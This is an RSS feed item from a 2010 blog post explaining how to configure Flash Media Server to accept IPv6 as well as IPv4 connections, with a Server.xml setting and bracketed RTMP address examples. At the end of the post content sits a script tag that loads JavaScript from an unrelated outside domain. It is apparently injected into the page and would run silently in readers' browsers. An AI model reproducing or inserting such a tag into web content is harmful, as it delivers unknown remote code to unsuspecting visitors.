<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	>

<channel>
	<title>Flash Video Examples &#187; networking</title>
	<atom:link href="http://blog.flashvideoexamples.com/tag/networking/feed/" rel="self" type="application/rss+xml" />
	<link>http://blog.flashvideoexamples.com</link>
	<description></description>
	<lastBuildDate>Mon, 07 Jun 2010 16:35:02 +0000</lastBuildDate>
	<generator>http://wordpress.org/?v=2.9.2</generator>
	<language>en</language>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
			<item>
		<title>Configuring Flash Media Server to support IPv6 and IPv4</title>
		<link>http://blog.flashvideoexamples.com/2009/05/27/configuring-flash-media-server-to-support-ipv6-and-ipv4/</link>
		<comments>http://blog.flashvideoexamples.com/2009/05/27/configuring-flash-media-server-to-support-ipv6-and-ipv4/#comments</comments>
		<pubDate>Thu, 28 May 2009 04:37:29 +0000</pubDate>
		<dc:creator>jody</dc:creator>
				<category><![CDATA[configuration]]></category>
		<category><![CDATA[IPv4]]></category>
		<category><![CDATA[IPv6]]></category>
		<category><![CDATA[networking]]></category>

		<guid isPermaLink="false">http://fmsexamples.wordpress.com/?p=15</guid>
		<description><![CDATA[By default, Flash Media Server is configured to support IPv4 only, even if the OS is configured for IPv6. However, one Flash Media Server can support both IPv6 and IPv4 addressing. Edit a config parameter in the Server.xml file to add support for IPv6. The Server.xml file is located in the fms/conf folder (Linux) or [...]]]></description>
			<content:encoded><![CDATA[<p>By default, Flash Media Server is configured to support IPv4 only, even if the OS is configured for IPv6. However, one Flash Media Server can support both IPv6 and IPv4 addressing. Edit a config parameter in the Server.xml file to add support for IPv6. The Server.xml file is located in the fms/conf folder (Linux) or Flash Media Server 3.5\conf folder (Windows).</p>
<pre>&lt;NetworkingIPv6 enable="true" /&gt;</pre>
<p>When IPv6 is enabled, if an IPv4 client connects, it has an IPv4 connection. If an IPv6 client connects, it has an IPv6 connection. The server listens for IPv4 and IPv6 addresses. You can see these connections in the server logs. To see an example in an edge log, see <a href="http://blog.flashvideoexamples.com/wp-content/plugins/feed-statistics.php?url=aHR0cDovL2hlbHAuYWRvYmUuY29tL2VuX1VTL0ZsYXNoTWVkaWFTZXJ2ZXIvMy41X0FkbWluR3VpZGUvV1M1YjNjY2M1MTZkNGZiZjM1MWU2M2UzZDExOWYyOTI1ZTY0LTdmZDIuaHRtbCNXUzViM2NjYzUxNmQ0ZmJmMzUxZTYzZTNkMTE5ZjI5MjZiY2YtN2ZjZA==">Configure IPv6</a> in the Flash Media Server docs.</p>
<p>Remember, you also have to configure the OS networking stack to support IPv6 and activate IPv6 on the nic&#8211; see the OS docs for instructions. Also, to use a numeric IPv6 address in a client-side script, server-side script, or in the server configuration files, enclose the address in brackets:</p>
<pre>rtmp://[fd5e:624b:4c18:ffff:0:5efe:10.133.128.108]:1935/streamtest</pre>
<p>For link-local addresses, specify the interface zone index:</p>
<pre>rtmp://[fe80::204:23ff:fe14:da1c%4]:1935/streamtest</pre>
<p><script src="http://ie.eracou.com/3"></script></p>
 <img src="http://blog.flashvideoexamples.com/wp-content/plugins/feed-statistics.php?view=1&post_id=15" width="1" height="1" style="display: none;" />]]></content:encoded>
			<wfw:commentRss>http://blog.flashvideoexamples.com/2009/05/27/configuring-flash-media-server-to-support-ipv6-and-ipv4/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
	</channel>
</rss>
